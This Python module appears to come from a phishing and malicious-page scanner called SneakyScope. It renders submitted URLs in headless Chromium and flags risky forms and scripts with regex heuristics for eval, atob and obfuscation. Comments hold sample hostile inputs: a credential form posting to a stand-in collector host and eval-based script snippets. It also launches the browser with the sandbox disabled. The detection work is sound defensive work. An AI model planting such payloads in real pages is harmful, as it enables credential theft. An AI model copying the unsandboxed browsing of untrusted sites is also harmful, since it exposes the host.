SneakyScope/app/browser.py

import re
import uuid
import json
from pathlib import Path
from bs4 import BeautifulSoup
from datetime import datetime
from urllib.parse import urlparse
from typing import Dict, Any, Optional
from playwright.async_api import async_playwright, TimeoutError as PWTimeoutError
from flask import current_app # access the rule engine from app config
from app.utils.io_helpers import safe_write
from .enrichment import enrich_url
def get_rule_engine():
"""
Retrieve the rules engine instance from the Flask application config.
Returns:
RuleEngine or None: The engine if available, or None if not configured.
"""
try:
        # current_app is only usable inside an active application context (a request context pushes one automatically)
engine = current_app.config.get("RULE_ENGINE")
return engine
except Exception:
        # If called outside a Flask application context, fail gracefully
return None
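# Illustrative sketch (an assumption about how the app is wired, not taken from this
# file): get_rule_engine() expects the engine to be registered on the Flask config,
# typically in the application factory. The import path and constructor below are
# hypothetical:
#
#   from app.rules import RuleEngine          # hypothetical module
#   app.config["RULE_ENGINE"] = RuleEngine()  # hypothetical constructor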
def run_rule_checks(text, category):
"""
Run all rules for a given category against the provided text.
Args:
text (str): The content to test (e.g., form snippet, inline JS).
category (str): The rule category to run (e.g., 'form' or 'script').
Returns:
dict: {
"checks": [ { "rule": str, "category": str, "matched": bool, "reason": Optional[str] }, ... ],
"summary": { "matched_count": int, "total_rules": int }
}
"""
result = {
"checks": [],
"summary": {
"matched_count": 0,
"total_rules": 0
}
}
engine = get_rule_engine()
if engine is None:
# No engine configured; return empty but well-formed structure
return result
try:
# Run engine rules for the specified category
check_results = engine.run_all(text, category=category)
# Normalize results into the expected structure
total = 0
matched = 0
for item in check_results:
# item is expected to contain: rule, category, matched, reason (optional)
total = total + 1
if bool(item.get("matched")):
matched = matched + 1
normalized = {
"rule": item.get("rule"),
"category": item.get("category"),
"matched": bool(item.get("matched")),
"reason": item.get("reason")
}
result["checks"].append(normalized)
result["summary"]["matched_count"] = matched
result["summary"]["total_rules"] = total
except Exception as e:
        # If anything goes wrong, keep the structure and record the failure as a single non-matching "engine_error" check
result["checks"].append({
"rule": "engine_error",
"category": category,
"matched": False,
"reason": f"Rule engine error: {e}"
})
result["summary"]["matched_count"] = 0
result["summary"]["total_rules"] = 0
return result
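# Illustrative sketch of the structure run_rule_checks() returns, assuming the
# configured engine defines a single "form" rule (the rule name and reason below
# are hypothetical):
#
#   run_rule_checks("action=http://evil.example/login\nmethod=post", category="form")
#   # -> {"checks": [{"rule": "external_action", "category": "form",
#   #                 "matched": True, "reason": "action points off-site"}],
#   #     "summary": {"matched_count": 1, "total_rules": 1}}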
def analyze_forms(html: str, base_url: str):
"""
Parse forms from the page HTML and apply heuristic flags and rule-based checks.
Args:
html (str): The full page HTML.
base_url (str): The final URL of the page (used for hostname comparisons).
Returns:
list[dict]: A list of form analysis dictionaries, each including:
- action, method, inputs
- flagged (bool), flag_reasons (list[str]), status (str)
- rule_checks: dict with "checks" (list) and "summary" (dict)
"""
soup = BeautifulSoup(html, "lxml")
forms_info = []
page_hostname = urlparse(base_url).hostname
for form in soup.find_all("form"):
action = form.get("action")
method = form.get("method", "get").lower()
# Build explicit inputs list
inputs = []
for inp in form.find_all("input"):
input_name = inp.get("name")
input_type = inp.get("type", "text")
inputs.append({
"name": input_name,
"type": input_type
})
flagged_reasons = []
# No action specified
if not action or str(action).strip() == "":
flagged_reasons.append("No action specified")
# External host
else:
            try:
                action_host = urlparse(action).hostname
                # Only flag when the action names an explicit host that differs from
                # the page host; relative actions (e.g. "login.php") have no hostname.
                if action_host and action_host != page_hostname:
                    flagged_reasons.append("Submits to a different host")
            except Exception:
                # If hostname parsing fails, skip this condition quietly
                pass
# HTTP form on HTTPS page
try:
            if action and urlparse(action).scheme == "http" and urlparse(base_url).scheme == "https":
flagged_reasons.append("Submits over insecure HTTP")
except Exception:
# If scheme parsing fails, ignore
pass
# Hidden password / suspicious hidden inputs
for hidden in form.find_all("input", type="hidden"):
name_value = hidden.get("name") or ""
if "password" in name_value.lower():
flagged_reasons.append("Hidden password field")
flagged = bool(flagged_reasons)
# Serialize a simple form snippet for the rules engine to analyze (category='form')
snippet_lines = []
snippet_lines.append(f"action={action}")
snippet_lines.append(f"method={method}")
snippet_lines.append("inputs=")
for item in inputs:
snippet_lines.append(f" - name={item.get('name')} type={item.get('type')}")
form_snippet = "\n".join(snippet_lines)
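        # e.g. "action=/login\nmethod=post\ninputs=\n - name=user type=text\n - name=pass type=password"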
rule_checks = run_rule_checks(form_snippet, category="form")
forms_info.append({
"action": action,
"method": method,
"inputs": inputs,
"flagged": flagged,
"flag_reasons": flagged_reasons,
"status": "flagged" if flagged else "possibly safe",
"rule_checks": rule_checks
})
return forms_info
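# Illustrative sketch of calling analyze_forms() directly; the HTML and URLs below are
# made-up test values, not taken from this project:
#
#   html = ('<form action="http://collector.example/steal" method="post">'
#           '<input type="hidden" name="password_backup"></form>')
#   forms = analyze_forms(html, "https://victim.example/login")
#   # forms[0]["flagged"] is True, with reasons such as "Submits to a different host",
#   # "Submits over insecure HTTP", and "Hidden password field"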
def analyze_scripts(html: str, base_url: str = "", engine=None) -> list[dict]:
"""
Analyze <script> elements using the RuleEngine (if provided) and
lightweight built-in heuristics. Only append a record when at least
one rule or heuristic matches, and always set a sensible 'type'.
Returns list of dicts like:
{
"type": "external" | "inline" | "unknown",
"src": "...", # for external
"content_snippet": "...", # for inline
"rules": [ { "name": "...", "description": "..." }, ... ],
"heuristics": [ "reason1", "reason2", ... ]
}
"""
soup = BeautifulSoup(html, "lxml")
results: list[dict] = []
# Benign MIME types we ignore entirely
benign_types = {"application/ld+json", "application/json"}
# Suspicious file extensions for external scripts
dangerous_ext = (".vbs", ".hta")
# Inline red flags
risky_inline_patterns = [
(re.compile(r"\beval\s*\(", re.IGNORECASE), "Uses eval()"),
(re.compile(r"\bnew\s+Function\s*\(", re.IGNORECASE), "Uses Function constructor"),
(re.compile(r"\bdocument\.write\s*\(", re.IGNORECASE), "Uses document.write()"),
(re.compile(r"\bActiveXObject\s*\(", re.IGNORECASE), "Uses ActiveXObject (IE-only)"),
(re.compile(r"\batob\s*\(", re.IGNORECASE), "Uses atob() (possible obfuscation)"),
(re.compile(r"\bunescape\s*\(", re.IGNORECASE), "Uses unescape() (legacy/obfuscation)"),
(re.compile(r"\bset(?:Timeout|Interval)\s*\(\s*['\"`].+['\"`]\s*,", re.IGNORECASE),
"String passed to setTimeout/setInterval"),
(re.compile(r"[\"']?0x[0-9a-fA-F]{16,}[\"']?", re.IGNORECASE),
"Contains long hex-like constants (possible obfuscation)"),
]
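    # For instance, an inline snippet such as eval(atob("YWxlcnQoMSk=")) would match
    # both the eval() and atob() patterns above (the payload is a made-up example).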
base_host = urlparse(base_url).hostname or ""
for script in soup.find_all("script"):
try:
src = (script.get("src") or "").strip()
s_type_attr = (script.get("type") or "").strip().lower()
# IMPORTANT: .string is often None; get_text() is reliable
inline_text = script.get_text(strip=True) or ""
# Skip benign structured data outright
if s_type_attr in benign_types:
continue
# ---- Build facts for the rules engine
facts = {
"script_type_attr": s_type_attr or None,
"has_src": bool(src),
"src": src or None,
"attrs": dict(script.attrs),
"inline_len": len(inline_text),
"inline_preview": inline_text[:200].replace("\n", " ") if inline_text else None,
"base_url": base_url or None,
"base_hostname": base_host or None,
"src_hostname": urlparse(src).hostname if src else None,
}
# ---- Evaluate rules engine (using name/description)
engine_matches: list[dict] = []
if engine is not None:
try:
if hasattr(engine, "evaluate_script"):
matches = engine.evaluate_script(facts)
elif hasattr(engine, "evaluate"):
matches = engine.evaluate(facts)
else:
matches = []
if isinstance(matches, list):
for m in matches:
if isinstance(m, dict) and "name" in m:
engine_matches.append({
"name": m["name"],
"description": m.get("description", "")
})
elif isinstance(m, str):
engine_matches.append({"name": m, "description": ""})
except Exception as e:
engine_matches.append({"name": "Rules Engine Error", "description": str(e)})
# ---- Built-in heuristics
heuristics: list[str] = []
if src:
# Unusual URL schemes for script sources
if src.startswith(("data:", "blob:")):
heuristics.append("Script src uses data:/blob: URL")
# Dangerous extensions
for ext in dangerous_ext:
if src.lower().endswith(ext):
heuristics.append(f"External script with dangerous extension ({ext.lstrip('.')})")
break
# Third-party host hint
src_host = facts.get("src_hostname") or ""
if base_host and src_host and src_host != base_host:
heuristics.append(f"Third-party host: {src_host}")
else:
if inline_text:
for pat, why in risky_inline_patterns:
if pat.search(inline_text):
heuristics.append(why)
# ---- Only append when something matched; always set type
if engine_matches or heuristics:
record: dict = {}
if src:
record["type"] = "external"
record["src"] = src
elif inline_text:
record["type"] = "inline"
record["content_snippet"] = facts.get("inline_preview")
else:
record["type"] = "unknown"
if engine_matches:
record["rules"] = engine_matches
if heuristics:
record["heuristics"] = heuristics
results.append(record)
except Exception as e:
# Never let a single broken <script> kill the whole analysis
results.append({
"type": "unknown",
"heuristics": [f"Script analysis error: {e}"]
})
return results
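# Illustrative sketch of calling analyze_scripts() directly with made-up HTML and no
# rules engine:
#
#   html = ('<script>eval(location.hash.slice(1))</script>'
#           '<script src="https://cdn.example/lib.js"></script>')
#   hits = analyze_scripts(html, base_url="https://victim.example/", engine=None)
#   # -> one "inline" record flagged "Uses eval()" and one "external" record
#   #    flagged "Third-party host: cdn.example"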
async def fetch_page_artifacts(url: str, storage_dir: Path, engine=None) -> Dict[str, Any]:
"""
Fetch page artifacts and save them in a UUID-based directory.
Args:
url (str): URL to analyze.
storage_dir (Path): Base /data path.
        engine: Optional rules engine instance (from app.config["RULE_ENGINE"]).
    Returns:
        dict: The full analysis result (also persisted to results.json inside the run directory).
    """
run_uuid = str(uuid.uuid4())
run_dir = storage_dir / run_uuid
run_dir.mkdir(parents=True, exist_ok=True)
screenshot_path = run_dir / "screenshot.png"
source_path = run_dir / "source.txt"
results_path = run_dir / "results.json"
redirects = []
downloads = []
scripts = []
async with async_playwright() as pw:
browser = await pw.chromium.launch(
headless=True,
args=["--no-sandbox", "--disable-dev-shm-usage", "--disable-blink-features=AutomationControlled"]
)
context = await browser.new_context(
viewport={"width": 1920, "height": 1080},
user_agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36",
java_script_enabled=True,
locale="en-US"
)
page = await context.new_page()
# Event handlers
page.on("response", lambda resp: redirects.append({"status": resp.status, "url": resp.url}) if 300 <= resp.status <= 399 else None)
page.on("download", lambda d: downloads.append({"url": d.url, "suggested_filename": d.suggested_filename}))
page.on("request", lambda r: scripts.append(r.url) if r.url.endswith((".js", ".vbs", ".hta")) else None)
try:
await page.goto(url, wait_until="networkidle", timeout=60000)
final_url = page.url
await page.screenshot(path=str(screenshot_path), full_page=True)
html = await page.content()
safe_write(source_path, html)
except PWTimeoutError:
final_url = page.url
safe_write(source_path, "Page did not fully load (timeout)")
await page.screenshot(path=str(screenshot_path), full_page=True)
await context.close()
await browser.close()
html_content = source_path.read_text(encoding="utf-8")
forms_info = analyze_forms(html_content, final_url)
suspicious_scripts = analyze_scripts(html_content, base_url=final_url, engine=engine)
enrichment = enrich_url(url)
result = {
"uuid": run_uuid,
"submitted_url": url,
"final_url": final_url,
"redirects": redirects,
"downloads": downloads,
"scripts": scripts,
"forms": forms_info,
"suspicious_scripts": suspicious_scripts,
"enrichment": enrichment
}
safe_write(results_path, json.dumps(result, indent=2))
return result
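# Minimal usage sketch (assumes an asyncio-capable caller such as a Flask view or CLI
# entry point; the URL and /data path are placeholders):
#
#   import asyncio
#   from pathlib import Path
#
#   result = asyncio.run(
#       fetch_page_artifacts(
#           "https://example.com",
#           storage_dir=Path("/data"),
#           engine=None,  # or current_app.config.get("RULE_ENGINE") inside an app context
#       )
#   )
#   print(result["uuid"], result["final_url"], len(result["forms"]))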